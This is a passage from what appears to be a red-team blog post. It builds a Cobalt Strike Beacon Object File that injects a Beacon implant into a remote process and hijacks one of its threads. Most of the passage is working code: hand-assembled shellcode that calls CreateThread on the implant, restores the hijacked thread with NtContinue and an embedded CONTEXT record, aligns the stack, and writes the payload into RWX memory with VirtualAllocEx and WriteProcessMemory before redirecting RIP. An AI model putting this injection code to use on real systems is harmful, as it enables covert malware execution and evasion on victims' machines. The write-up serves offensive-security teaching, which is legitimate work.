Since we are working on a 64-bit system, we must adhere to the __fastcall calling convention. This calling convention requires that the first four integer arguments (floating-point values are passed in different registers) are passed in the RCX, RDX, R8, and R9 registers, respectively. However, the question remains - CreateThread has a total of six parameters, what do we do with the last two? With __fastcall, the caller reserves 0x20 bytes of “shadow space” at the top of the stack for the four register arguments, so the fifth and subsequent parameters are located on the stack starting at an offset of 0x20, one every 0x8 bytes. This means, for our purposes, the fifth parameter will be located at RSP + 0x20 and the sixth will be located at RSP + 0x28. Here are the parameters used for our purposes.

  1. lpThreadAttributes will be set to NULL. Setting this value to NULL will ensure the thread handle isn’t inherited by child processes.
  2. dwStackSize will be set to 0. Setting this parameter to 0 forces the thread to inherit the default stack size for the executable, which is fine for our purposes.
  3. lpStartAddress, as previously mentioned, will be the address of our shellcode. This parameter is a function pointer to be executed by the thread.
  4. lpParameter will be set to NULL, as our thread does not need to inherit any variables.
  5. dwCreationFlags will be set to 0, which indicates we would like the thread to run immediately after it is created. This will kick off our Beacon implant, after thread creation.
  6. lpThreadId will be set to NULL, which is of less importance to us - as this means no thread ID is returned through the LPDWORD pointer parameter. Essentially, we could have passed a legitimate pointer to a DWORD and it would have been filled with the thread ID. However, this is not important for the purposes of this post.
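
The register and stack placement described above can be sketched as a small helper. This is a standalone illustration, not part of the BOF, and the function name stack_arg_offset is hypothetical. It only models integer and pointer arguments, and it assumes the offset is measured from RSP as the caller sees it right before the call instruction executes.

```c
/* Hypothetical helper: returns the offset from RSP (as seen by the caller
 * immediately before the call instruction) at which a 1-based integer
 * argument lives, or -1 when the argument is not on the stack
 * (arguments 1 through 4 travel in RCX, RDX, R8, and R9). */
int stack_arg_offset(int arg_index)
{
    if (arg_index <= 4)
        return -1;  /* register argument, or an invalid index */

    /* Arguments 5 and up start at RSP + 0x20 and are 8 bytes apart. */
    return 0x20 + (arg_index - 5) * 8;
}
```

For CreateThread, stack_arg_offset(5) gives 0x20 for dwCreationFlags and stack_arg_offset(6) gives 0x28 for lpThreadId, matching the offsets used in the routine.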

The first step is to place a value of NULL, or 0, into the RCX register, for the lpThreadAttributes argument. To do this, we can use bitwise XOR.

// xor rcx, rcx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

This performs a bitwise XOR of RCX with itself. XORing any value with itself results in 0, and the result is then placed in the RCX register. Similarly, we can leverage the same property of XOR for the second parameter, dwStackSize, which is also 0.

// xor rdx, rdx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xd2;
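
For anyone curious where these three bytes come from, here is a minimal sketch of how an xor reg, reg instruction is encoded for 64-bit registers. The helper name emit_xor_self is hypothetical and this is portable C for illustration only, not BOF code. It assumes the standard x86-64 register numbering (RCX is 1, RDX is 2, R9 is 9).

```c
#include <stdint.h>
#include <stddef.h>

/* Hypothetical helper: writes "xor reg, reg" for a 64-bit register
 * (0 = RAX, 1 = RCX, 2 = RDX, ... 8 = R8, 9 = R9, ... 15 = R15)
 * and returns the number of bytes written (always 3). */
size_t emit_xor_self(uint8_t *buf, unsigned reg)
{
    uint8_t rex = 0x48;               /* REX.W: 64-bit operand size */
    uint8_t low = (uint8_t)(reg & 7); /* low three bits go into ModRM */

    if (reg >= 8)
        rex |= 0x05;                  /* REX.R and REX.B extend both ModRM fields */

    buf[0] = rex;
    buf[1] = 0x31;                    /* XOR r/m64, r64 */
    buf[2] = (uint8_t)(0xC0 | (low << 3) | low); /* mod=11, reg=low, rm=low */
    return 3;
}
```

Register 1 produces 48 31 c9 and register 2 produces 48 31 d2, the same bytes written above. Register 9 produces 4d 31 c9, which is the xor r9, r9 used later in the routine.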

The next parameter, lpStartAddress, is really the only one we need to supply a specific value for. Before supplying this parameter, let’s take a quick look back at our first injection, which planted the Beacon implant into the desired remote process.

The above code returns the virtual memory address of our allocation into the variable placeRemotely. As can be seen, this return value is of the data type LPVOID, while the lpStartAddress argument takes a data type of LPTHREAD_START_ROUTINE, which is pretty similar to LPVOID. However, for continuity’s sake, we will first type cast this allocation into an LPTHREAD_START_ROUTINE function pointer.

// Casting shellcode address to LPTHREAD_START_ROUTINE function pointer
LPTHREAD_START_ROUTINE threadCast = (LPTHREAD_START_ROUTINE)placeRemotely;

In order to place this value into the BYTE array, we will need to use a function that can copy this address to the buffer, as the BYTE array will only accept one byte at a time. There is a limitation however, as BOFs do not link C-Runtime functions such as memcpy. We can overcome this by creating our own custom memcpy routine, or grabbing one from the MSVCRT library, which Cobalt Strike can link for us. However, for now and for awareness of others, we will leverage a libc.h header file that Raphael created, which can be found here.

Using the custom mycopy function, we can now perform a mov r8, LPTHREAD_START_ROUTINE instruction.

// mov r8, LPTHREAD_START_ROUTINE
createThread[z++] = 0x49;
createThread[z++] = 0xb8;
mycopy(createThread + z, &threadCast, sizeof(threadCast));
z += sizeof(threadCast);

Notice how the end of this small shellcode blob contains an update for the array index counter z, to ensure the array is written to at the correct index. We have the luxury of using a mov r8, LPTHREAD_START_ROUTINE, as our shellcode pointer has already been mapped into the remote process. This will allow the CreateThread routine to find this function pointer, in memory, as it is available within the remote process address space. We must remember that each process on Windows has its own private virtual address space, meaning memory in one user mode process isn’t visible to another user mode process. As we will see with the NtContinue stub coming up, we will actually have to embed the preserved CONTEXT record of the hijacked thread into the payload itself, as the structure is located in the current process, while the code will be executing within the desired remote process.
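
To make the layout of this instruction concrete, here is a minimal sketch of a mov reg, imm64 encoder. The helper name emit_mov_imm64 is hypothetical, and the code is a portable illustration rather than something to drop into the BOF. It writes the immediate one byte at a time, least significant byte first, which is the same order mycopy produces when copying a 64-bit value on x64.

```c
#include <stdint.h>
#include <stddef.h>

/* Hypothetical helper: writes "mov reg, imm64" for a 64-bit register
 * (0 = RAX ... 8 = R8 ... 15 = R15) and returns the length (always 10). */
size_t emit_mov_imm64(uint8_t *buf, unsigned reg, uint64_t value)
{
    int k;

    buf[0] = (uint8_t)(0x48 | (reg >= 8 ? 0x01 : 0x00)); /* REX.W, plus REX.B for R8-R15 */
    buf[1] = (uint8_t)(0xB8 + (reg & 7));                /* MOV r64, imm64 */

    for (k = 0; k < 8; k++)                              /* little-endian immediate */
        buf[2 + k] = (uint8_t)(value >> (8 * k));

    return 10;
}
```

With register 8 this yields 49 b8 followed by the eight address bytes, and with register 0 it yields 48 b8, the prefix used later for mov rax. Advancing the counter by the returned length plays the same role as z += sizeof(threadCast).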

Now that the lpStartAddress parameter has been completed, lpParameter must be set to NULL. Again, this can be done by utilizing bitwise XOR.

// xor r9, r9
createThread[z++] = 0x4d;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

The last two parameters, dwCreationFlags and lpThreadId, will be located at an offset of 0x20 and 0x28, respectively, from RSP. Since R9 already contains a value of 0, and since both parameters need a value of 0, we can use two mov instructions, as such.

// mov [rsp+20h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x20;

// mov [rsp+28h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x28;

A quick note - notice that the brackets surrounding each [rsp+OFFSET] operand indicate a memory operand. We are overwriting the value stored at that address, not the register itself.
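
The five bytes of each of these mov instructions break down as sketched below. The helper name emit_store_r9_at_rsp is hypothetical and the code is a standalone illustration. It assumes the displacement fits in a signed byte (0x7f or less), which holds for both 0x20 and 0x28.

```c
#include <stdint.h>
#include <stddef.h>

/* Hypothetical helper: writes "mov [rsp+disp8], r9" and returns the length (always 5). */
size_t emit_store_r9_at_rsp(uint8_t *buf, uint8_t disp8)
{
    buf[0] = 0x4C;   /* REX.W | REX.R: 64-bit operand, source register is R9 */
    buf[1] = 0x89;   /* MOV r/m64, r64 */
    buf[2] = 0x4C;   /* ModRM: mod=01 (disp8), reg=001 (low bits of R9), rm=100 (SIB follows) */
    buf[3] = 0x24;   /* SIB: no index register, base=RSP */
    buf[4] = disp8;  /* 0x20 for the fifth argument, 0x28 for the sixth */
    return 5;
}
```

Note that the value 0x4c appears twice for different reasons: the first is the REX prefix, and the second is the ModRM byte.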

The next goal is to resolve the address of CreateThread. Even though we will be resolving this address within the BOF, meaning it will be resolved within the current process, not the desired remote process, the address of CreateThread will be the same across processes, although each user mode process is mapped its own view of kernel32.dll. To resolve this address, we will use the following routine, with BOF denotations in our code.

// Resolve the address of CreateThread
// GetProcAddress returns a FARPROC, so cast it explicitly to a 64-bit integer
unsigned long long createthreadAddress = (unsigned long long)KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32"), "CreateThread");

// Error handling
if (createthreadAddress == 0)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve CreateThread. Error: 0x%lx\n", KERNEL32$GetLastError());
}

The unsigned long long variable createthreadAddress will be filled with the address of CreateThread. unsigned long long is a 64-bit value, which is the size of a memory address on a 64-bit system. Although KERNEL32$GetProcAddress has a prototype with a return value of FARPROC, we need the address to actually be of the type unsigned long long, DWORD64, or similar, to allow us to properly copy this address into the routine with mycopy. The next goal is to move the address of CreateThread into RAX. After this, we will perform a call rax instruction, which will kick off the routine. This can be seen below.

// mov rax, CreateThread
createThread[z++] = 0x48;
createThread[z++] = 0xb8;
mycopy(createThread + z, &createthreadAddress, sizeof(createthreadAddress));
z += sizeof(createthreadAddress);

// call rax (call CreateThread)
createThread[z++] = 0xff;
createThread[z++] = 0xd0;

Additionally, we want to add a ret opcode. The way our full payload will be set up is as follows:

  1. A call to the stack alignment/CreateThread routine will be made first (the stack alignment routine will be covered in a later portion of this blog). When a call instruction is executed, it pushes a return address onto the stack. This is the address that ret will jump to in order to continue execution of the payload. When the stack alignment/CreateThread routine is called, a return address will be pushed onto the stack. This return address will actually be an address within the NtContinue routine.
  2. We want to end our stack alignment/CreateThread routine with a ret instruction. This ret will force execution back to the NtContinue routine. This will all be outlined when execution is examined inside of WinDbg.
  3. The call to the stack alignment/CreateThread routine is actually going to be a part of the NtContinue routine. The first instruction in the NtContinue routine will be a call to the stack alignment/CreateThread shellcode, which will then perform a ret back to the NtContinue routine, where thread execution will be restored. Here is a quick visual.

PAYLOAD = NtContinue shellcode calls stack alignment/CreateThread shellcode -> stack alignment/CreateThread shellcode executes, placing Beacon in its own local thread. This shellcode performs a return back to the NtContinue shellcode -> NtContinue shellcode finishes executing, which restores the thread

In accordance with our plan, let’s end the CreateThread routine with a 0xc3 opcode, which is a return instruction.

// Return to the caller in order to kick off NtContinue routine
createThread[z++] = 0xc3;
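
As a sanity check that the whole routine fits in the 64-byte array, here is a standalone sketch that lays down the same bytes in the same order and reports how many were used. The function name build_create_thread_routine and its parameters are hypothetical, memcpy stands in for mycopy, and the code assumes a little-endian host (true for x64) so that the copied addresses land in the order the CPU expects.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical standalone version of the CreateThread routine builder.
 * start_address stands in for the Beacon allocation and create_thread for
 * the resolved CreateThread address. Returns the number of bytes used. */
size_t build_create_thread_routine(uint8_t out[64],
                                   uint64_t start_address,
                                   uint64_t create_thread)
{
    static const uint8_t before_start[] = {
        0x48, 0x31, 0xc9,               /* xor rcx, rcx */
        0x48, 0x31, 0xd2,               /* xor rdx, rdx */
        0x49, 0xb8                      /* mov r8, imm64 (immediate follows) */
    };
    static const uint8_t before_target[] = {
        0x4d, 0x31, 0xc9,               /* xor r9, r9 */
        0x4c, 0x89, 0x4c, 0x24, 0x20,   /* mov [rsp+20h], r9 */
        0x4c, 0x89, 0x4c, 0x24, 0x28,   /* mov [rsp+28h], r9 */
        0x48, 0xb8                      /* mov rax, imm64 (immediate follows) */
    };
    static const uint8_t tail[] = {
        0xff, 0xd0,                     /* call rax */
        0xc3                            /* ret */
    };
    size_t z = 0;

    memset(out, 0, 64);
    memcpy(out + z, before_start, sizeof(before_start));
    z += sizeof(before_start);
    memcpy(out + z, &start_address, sizeof(start_address));
    z += sizeof(start_address);
    memcpy(out + z, before_target, sizeof(before_target));
    z += sizeof(before_target);
    memcpy(out + z, &create_thread, sizeof(create_thread));
    z += sizeof(create_thread);
    memcpy(out + z, tail, sizeof(tail));
    z += sizeof(tail);

    return z;
}
```

The routine comes to 42 bytes, so the final value of z stays well inside the 64-byte buffer and the remaining bytes are left as zero padding.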

Let’s continue by developing a NtContinue shellcode routine. After that, we will develop a stack alignment shellcode in order to ensure the stack pointer is 16-byte aligned, when the first call occurs in our final payload. Once we have completed both of these routines, we will walk through the entire shellcode inside of the debugger.

“Never in the Field of Human Conflict, Was So Much Owed, by So Many, to NtContinue”

Up until now, we have achieved the following:

  1. Our shellcode has been injected into the remote process.
  2. We have identified a remote thread, which we will later manipulate to execute our Beacon implant.
  3. We have created a routine that will place the Beacon implant in its own local thread, within the remote process, upon execution.

This is great, and we are almost home free. What remains, however, is the topic of thread restoration. After all, we are taking a thread, which was performing some sort of action before, unbeknownst to us, and forcing it to do something else. This will certainly result in execution of our shellcode, however, it will also present some unintended consequences. Upon executing our shellcode, the thread’s CPU registers, along with other information, will be out of context from the actions it was performing before execution. This will most likely cause the process housing this thread, the desired remote process we are injecting into, to crash. To avoid this, we can utilize an undocumented ntdll.dll function, NtContinue. As pointed out in Alex Ionescu and Yarden Shafir’s R.I.P ROP: CET Internals in Windows 20H1 blog post, NtContinue is used to resume execution after an exception or interrupt. This is perfect for our use case, as we can abuse this functionality. Since our thread will be mangled, calling this function with the preserved CONTEXT record from earlier will restore execution properly. NtContinue accepts a pointer to a CONTEXT record, and a parameter that allows a programmer to set whether the Alerted state should be removed from the thread, as outlined in its function prototype. We need not worry about the second parameter for our purposes, as we will set this parameter to FALSE. However, there remains the issue of the first parameter, PCONTEXT.

As you may recall from the earlier portion of this blog post, we first preserved the CONTEXT record for our hijacked thread, within our BOF code. The issue we have, however, is that this CONTEXT record is sitting within the current process, while our shellcode will be executed within the desired remote process. Because each user mode process has its own private address space, this CONTEXT record’s address is not visible to the remote process we are injecting into. Additionally, since NtContinue does not accept a HANDLE parameter, it assumes the thread it will resume execution for is the current calling thread, which will be in the remote process. This means we will need to embed the CONTEXT record into our final payload that will be injected into the remote process. It is also why we need to embed an NtContinue shellcode into the final payload that will be placed into the remote process, since NtContinue restores execution of the calling thread. That way, when the hijacked thread executes the NtContinue routine, restoration of the hijacked thread will occur, since it is the calling thread. With that said, let’s get into developing the routine.

As with our CreateThread routine, let’s create a 64-byte buffer and a new counter.

BYTE ntContinue[64] = { 0 };
int i = 0;

As mentioned earlier, this NtContinue routine is going to be the piece of code that actually invokes the CreateThread routine. When this NtContinue routine performs the call to the CreateThread routine, it will push a return address on the stack, which will be the next instruction within this NtContinue shellcode. When the CreateThread shellcode performs its return, execution will pick back up inside of the NtContinue shellcode. With this in mind, let’s start by using a near call, which uses relative addressing, to call the CreateThread shellcode.

The first goal is to start off the NtContinue routine with a call to the CreateThread routine. To do this, we first need to calculate the distance from this call instruction to the location of the CreateThread shellcode. In order to properly do this, we need to take one thing into consideration: we also need to carry the preserved CONTEXT record with us, for use in the NtContinue call. To do this, we will use a near call. Near calls, in assembly, do not call an absolute address, like the address of a Windows API function, for instance. Instead, near call instructions can be used to call a function relative to the address in the instruction pointer. Essentially, if we can calculate the distance, in a DWORD, to the CreateThread routine, we can just use the opcode 0xe8, along with a DWORD to represent the distance from the current memory location, in order to dynamically call the CreateThread routine! The reason we are using a DWORD, which is a 32-bit value, is because the x86 instruction set, which is usable by 64-bit systems, allows either a 16-bit or 32-bit relative virtual address (RVA). However, this 32-bit value is sign extended to a 64-bit value on 64-bit systems. More information on the different calling mechanisms on x86_64 systems can be found here. The offset to our shellcode will be the size of our NtContinue routine plus the size of a CONTEXT record. This essentially will “jump over” the NtContinue code and the CONTEXT record, in order to first execute the CreateThread routine. The corresponding instructions we need are as follows.

// First calculate the size of a CONTEXT record and NtContinue routine
// Then, "jump over shellcode" by calling the buffer at an offset of the calculation (64 bytes + CONTEXT size)

// 0xe8 is a near call, which uses RIP as the base address for RVA calculations and dynamically adds the offset specified by shellcodeOffset
ntContinue[i++] = 0xe8;

// Subtracting to compensate for the near call opcode (represented by i) and the DWORD used for relative addressing
DWORD shellcodeOffset = sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i;
mycopy(ntContinue + i, &shellcodeOffset, sizeof(shellcodeOffset));

// Update counter with location buffer can be written to
i += sizeof(shellcodeOffset);

Although the above code practically represents what was said above, you can see that the size of a DWORD and the value of i are subtracted from the offset previously mentioned. This is because the whole NtContinue routine is 64 bytes. By the time the code has finished executing the entire call instruction, a few things will have happened. The first being, the call opcode itself, 0xe8, will have been executed. This takes us from being at the beginning of our routine, byte 1/64, to the second byte in our routine, byte 2/64. The CreateThread routine, which we need to call, is now one byte closer than when we started - and this will affect our calculations. In the above set of instructions, this byte has been compensated for, by subtracting the already executed opcode (the current value of i). Additionally, four bytes are taken up by the actual offset itself, a DWORD, which is a 4 byte value. This means execution will now be at byte 5/64 (one byte for the opcode and four bytes for the DWORD). To compensate for this, the size of a DWORD has been subtracted from the total offset. If you think about it, this makes sense. By the time the call has finished executing, the CreateThread routine will be five bytes closer. If we used the original offset, we would have overshot the CreateThread routine by five bytes. Additionally, we update the i counter variable to record how many bytes we have written to the overall NtContinue routine. We will walk through all of these instructions inside of the debugger, once we have finished developing this small shellcode routine.
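
The five-byte compensation described above is really just the general rule for near calls: the displacement is added to the address of the next instruction. Here is a minimal sketch of that rule with a hypothetical helper named near_call_rel32. The worked numbers assume sizeof(CONTEXT) is 0x4D0 (1232) bytes on x64, which is an assumption on my part for this example, although it lines up with the 0x...510 call target shown in the debugger later.

```c
#include <stdint.h>

/* Hypothetical helper: computes the rel32 operand for a 5-byte near call
 * (0xE8 followed by a DWORD) located at call_offset that should land on
 * target_offset. Both offsets are measured from the start of the same buffer. */
int32_t near_call_rel32(uint32_t call_offset, uint32_t target_offset)
{
    /* The CPU adds rel32 to the address of the NEXT instruction,
     * which sits 5 bytes past the start of the call. */
    int64_t next_instruction = (int64_t)call_offset + 5;
    return (int32_t)((int64_t)target_offset - next_instruction);
}
```

With the call at offset 0 and the target at 64 + 1232 = 1296 (0x510), the result is 1291 (0x50B), the same value as sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i when i is 1. A call at offset 5 that targets offset 10 gets a displacement of 0.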

At this point, the NtContinue routine would have called the CreateThread routine. The CreateThread routine would have returned execution back to the NtContinue routine, and the next instructions in the NtContinue routine would execute.

The next few instructions are a bit of a “hacky” method to pass the first parameter, a pointer to our CONTEXT record, to the NtContinue function. We will use a call/pop routine, which is a well-documented method and can be read about here and here. As we know, we are required to place the first value, for our purposes, into the RCX register - per the __fastcall calling convention. This means we need to calculate the address of the CONTEXT record somehow. To do this, we actually use another near call instruction in order to call the byte immediately after the call instruction.

// Near call instruction with a displacement of 0, which calls the address directly after it (call pushes the return address, which is the address of the next instruction, onto the stack so it can be popped)
ntContinue[i++] = 0xe8;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;

The instruction this call will execute is the immediate next instruction to be executed, which will be a pop rcx instruction added by us. Additionally the value of i at this point is saved into a new variable called contextOffset.

// The previous call instruction pushes a return address onto the stack
// The return address will be the address, in memory, of the upcoming pop rcx instruction
// Since current execution is no longer at the beginning of the ntContinue routine, the distance to the CONTEXT record is no longer 64-bytes
// The address of the pop rcx instruction will be used as the base for RVA calculations to determine the distance between the value in RCX (which will be the address of the 'pop rcx' instruction) to the CONTEXT record
// Obtaining the current amount of bytes executed thus far
int contextOffset = i;

// __fastcall calling convention
// NtContinue requires a pointer to a context record and an alert state (FALSE in this case)
// pop rcx (get return address, which isn't needed for anything, into RCX for RVA calculations)
ntContinue[i++] = 0x59;

The purpose of this is that the call instruction will push the address of the pop rcx instruction onto the stack. This is the return address of the call. Since the next instruction directly after the call is pop rcx, it will place the value at RSP, which is now the address of the pop rcx instruction due to call POP_RCX_INSTRUCTION pushing it onto the stack, into the RCX register. This helps us, as now we have a memory address that is relatively close to the CONTEXT record, which will be located directly after the 64-byte NtContinue routine.

Now, as we know, the original offset of the CONTEXT record from the very beginning of the entire NtContinue routine was 64 bytes. This is because we will copy the CONTEXT record directly after the 64-byte BYTE array, ntContinue, in our final buffer. Right now, however, if we add 64 bytes to the value in RCX, we will overshoot the CONTEXT record’s address. This is because we have executed quite a few instructions of the 64-byte shellcode, meaning we are now closer to the CONTEXT record than we were when we started. To compensate for this, we can add the original 64-byte offset to the RCX register, and then subtract the contextOffset value, which represents the total amount of opcodes executed up until that point. This will give us the correct distance from our current location to the CONTEXT record.

// The address of the pop rcx instruction is now in RCX
// Adding the distance between the CONTEXT record and the current address in RCX
// add rcx, distance to CONTEXT record
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xc1;

// Value to be added to RCX
// The distance between the value in RCX (address of the 'pop rcx' instruction) and the CONTEXT record can be found by subtracting the amount of bytes executed up until the 'pop rcx' instruction from the original 64-byte offset
ntContinue[i++] = sizeof(ntContinue) - contextOffset;

This will place the address of the CONTEXT record into the RCX register. If this doesn’t compute, don’t worry. In a brief moment, we will step through everything inside of WinDbg to visually put things together.
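
Here is the same arithmetic as a minimal standalone sketch, using a hypothetical helper named context_disp8. One thing it makes explicit is that the 48 83 c1 form of add rcx takes a single sign-extended byte, so the distance has to be 0x7f or less. That is comfortably true for a 64-byte routine, but it would matter if the routine buffer were ever enlarged.

```c
/* Hypothetical helper: computes the imm8 operand for "add rcx, imm8".
 * routine_size is the size of the routine buffer that precedes the CONTEXT
 * record, and pop_offset is the offset of the "pop rcx" instruction within
 * that buffer. Returns -1 if the distance cannot be encoded as a positive
 * signed 8-bit value. */
int context_disp8(unsigned routine_size, unsigned pop_offset)
{
    unsigned distance;

    if (pop_offset > routine_size)
        return -1;                      /* pop rcx would sit past the routine */

    distance = routine_size - pop_offset;
    return distance <= 0x7F ? (int)distance : -1;
}
```

In our routine the two near calls take up 10 bytes, so pop rcx sits at offset 10 and context_disp8(64, 10) gives 0x36. Adding that to the address of pop rcx lands exactly on byte 64, where the CONTEXT record begins.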

The next goal is to set the RaiseAlert function argument to FALSE, which is a value of 0. To do this, again, we will use bitwise XOR.

// xor rdx, rdx
// Set to FALSE
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x31;
ntContinue[i++] = 0xd2;

All that is left now is to call NtContinue! Again, just like our call to CreateThread, we can resolve the address of the API inside of the current process and pass the return value to the remote process, as even though each process is mapped its own Windows DLLs, the addresses are the same across the system.

The opcode bytes for the mov rax instruction come first.

// Place NtContinue into RAX
ntContinue[i++] = 0x48;
ntContinue[i++] = 0xb8;

We then resolve the address of NtContinue, Beacon Object File style.

// Although the thread is in a remote process, the Windows DLLs mapped to the Beacon process, although private, will correlate to the same virtual address
// GetProcAddress returns a FARPROC, so cast it explicitly to a 64-bit integer
unsigned long long ntcontinueAddress = (unsigned long long)KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll"), "NtContinue");

// Error handling. Report the failure if NtContinue cannot be resolved
if (ntcontinueAddress == 0)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve NtContinue. Error: 0x%lx\n", KERNEL32$GetLastError());
}

Using the custom mycopy function, we then can copy the address of NtContinue at the correct index within the BYTE array, based on the value of i.

// Copy the address of NtContinue function address to the NtContinue routine buffer
mycopy(ntContinue + i, &ntcontinueAddress, sizeof(ntcontinueAddress));

// Update the counter with the correct offset the next bytes should be written to
i += sizeof(ntcontinueAddress);

At this point, things are as easy as just allocating some stack space for good measure and calling the value in RAX, NtContinue!

// Allocate some space on the stack for the call to NtContinue
// sub rsp, 0x20
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xec;
ntContinue[i++] = 0x20;

// call NtContinue
ntContinue[i++] = 0xff;
ntContinue[i++] = 0xd0;

All that is left now is the stack alignment routine, which runs right before the CreateThread routine! This alignment is to ensure the stack pointer is 16-byte aligned when the call from the NtContinue routine invokes the CreateThread routine.

Will The Stars Align?

The following routine will perform bitwise AND with the stack pointer, to ensure a 16-byte aligned RSP value inside of the CreateThread routine, by clearing out the last 4 bits of the address.

// Create 4 byte buffer to perform bitwise AND with RSP to ensure 16-byte aligned stack for the call to shellcode
BYTE stackAlignment[4] = { 0 };

// and rsp, 0FFFFFFFFFFFFFFF0
stackAlignment[0] = 0x48;
stackAlignment[1] = 0x83;
stackAlignment[2] = 0xe4;
stackAlignment[3] = 0xf0;
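
It may not be obvious how the single byte 0xf0 becomes the 64-bit mask 0FFFFFFFFFFFFFFF0. The sketch below models that, with hypothetical helper names sign_extend_imm8 and align_rsp_16. It is plain C that mimics what the CPU does with the immediate, not code that touches the real stack pointer.

```c
#include <stdint.h>

/* Hypothetical helper: models how the CPU widens the imm8 operand of
 * "and rsp, imm8" to 64 bits. If the top bit of the byte is set,
 * the upper 56 bits are filled with ones. */
uint64_t sign_extend_imm8(uint8_t imm8)
{
    if (imm8 & 0x80)
        return 0xFFFFFFFFFFFFFF00ULL | imm8;
    return imm8;
}

/* Hypothetical helper: the value RSP would hold after "and rsp, 0xF0".
 * Clearing the low 4 bits rounds the address down to a multiple of 16. */
uint64_t align_rsp_16(uint64_t rsp)
{
    return rsp & sign_extend_imm8(0xF0);
}
```

An RSP value that is already a multiple of 16 passes through unchanged, while a value such as 0x1008 is rounded down to 0x1000.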

After the stack alignment is completed, all there is left to do is invoke malloc to create a large buffer that will contain all of our custom routines, inject the final buffer, and call SetThreadContext and ResumeThread to queue execution!

// Allocating memory for final buffer
// Size of NtContinue routine, CONTEXT structure, stack alignment routine, and CreateThread routine
PVOID shellcodeFinal = (PVOID)MSVCRT$malloc(sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread));

// Copy NtContinue routine to final buffer
mycopy(shellcodeFinal, ntContinue, sizeof(ntContinue));

// Copying CONTEXT structure, stack alignment routine, and CreateThread routine to the final buffer
// Allocation is a PVOID - casting to char* so pointer arithmetic is done in bytes, in order to write to the buffer at a desired offset
// Using RtlMoveMemory for the CONTEXT structure to avoid casting to something other than a CONTEXT structure
NTDLL$RtlMoveMemory((char*)shellcodeFinal + sizeof(ntContinue), &cpuRegisters, sizeof(CONTEXT));
mycopy((char*)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT), stackAlignment, sizeof(stackAlignment));
mycopy((char*)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment), createThread, sizeof(createThread));

// Declare a variable to represent the final length
int finalLength = (int)sizeof(ntContinue) + (int)sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread);

Before moving on, notice the call to RtlMoveMemory when it comes to copying the CONTEXT record to the buffer. This is due to mycopy being prototyped to access the source and destination buffers as char* data types. However, RtlMoveMemory is prototyped to accept data types of VOID UNALIGNED, which indicates pretty much any data type can be used, which is perfect for us as CONTEXT is a structure, not a char*.

The above code creates a buffer with the combined size of our routines, and copies each of them into the buffer at the correct offset, with the NtContinue routine being copied first, followed by the preserved CONTEXT record of the hijacked thread, the stack alignment routine, and the CreateThread routine. After this, the shellcode is injected into the remote process.
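
To visualize where each piece lands, here is a minimal sketch that computes the offsets for the final buffer. The struct payload_layout and the function compute_layout are hypothetical names used only for illustration. The sizes are passed in as parameters so the sketch stays portable, and the worked numbers assume sizeof(CONTEXT) is 0x4D0 (1232) bytes on x64.

```c
#include <stddef.h>

/* Hypothetical description of where each piece lands in the final buffer. */
struct payload_layout {
    size_t nt_continue;      /* offset of the NtContinue routine */
    size_t context;          /* offset of the preserved CONTEXT record */
    size_t stack_alignment;  /* offset of the stack alignment routine */
    size_t create_thread;    /* offset of the CreateThread routine */
    size_t total;            /* total number of bytes to allocate and write */
};

/* Hypothetical helper: each piece starts where the previous one ends. */
struct payload_layout compute_layout(size_t nt_continue_size,
                                     size_t context_size,
                                     size_t alignment_size,
                                     size_t create_thread_size)
{
    struct payload_layout layout;

    layout.nt_continue = 0;
    layout.context = layout.nt_continue + nt_continue_size;
    layout.stack_alignment = layout.context + context_size;
    layout.create_thread = layout.stack_alignment + alignment_size;
    layout.total = layout.create_thread + create_thread_size;
    return layout;
}
```

Calling compute_layout(64, 1232, 4, 64) places the CONTEXT record at offset 0x40, the stack alignment routine at 0x510, the CreateThread routine at 0x514, and gives a total of 1364 bytes. The 0x510 offset is the target of the first near call in the NtContinue routine.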

First, VirtualAllocEx is called again.

// Inject the shellcode into the target process with read/write/execute permissions
PVOID allocateMemory = KERNEL32$VirtualAllocEx(
	processHandle,
	NULL,
	finalLength,
	MEM_RESERVE | MEM_COMMIT,
	PAGE_EXECUTE_READWRITE
);

if (allocateMemory == NULL)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to allocate memory in the remote process. Error: 0x%lx\n", KERNEL32$GetLastError());
}

Secondly, WriteProcessMemory is called to write the shellcode to the allocation.

// Write shellcode to the new allocation
BOOL writeMemory = KERNEL32$WriteProcessMemory(
	processHandle,
	allocateMemory,
	shellcodeFinal,
	finalLength,
	NULL
);

if (!writeMemory)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to write memory to the buffer. Error: 0x%lx\n", KERNEL32$GetLastError());
}

After that, RSP and RIP are set before the call to SetThreadContext. RIP will point to our final buffer, and once the thread is resumed, execution will begin at the address in RIP.

// Allocate stack space by subtracting the stack by 0x2000 bytes
cpuRegisters.Rsp -= 0x2000;

// Change RIP to point to our shellcode and typecast buffer to a DWORD64 because that is what a CONTEXT structure uses
cpuRegisters.Rip = (DWORD64)allocateMemory;

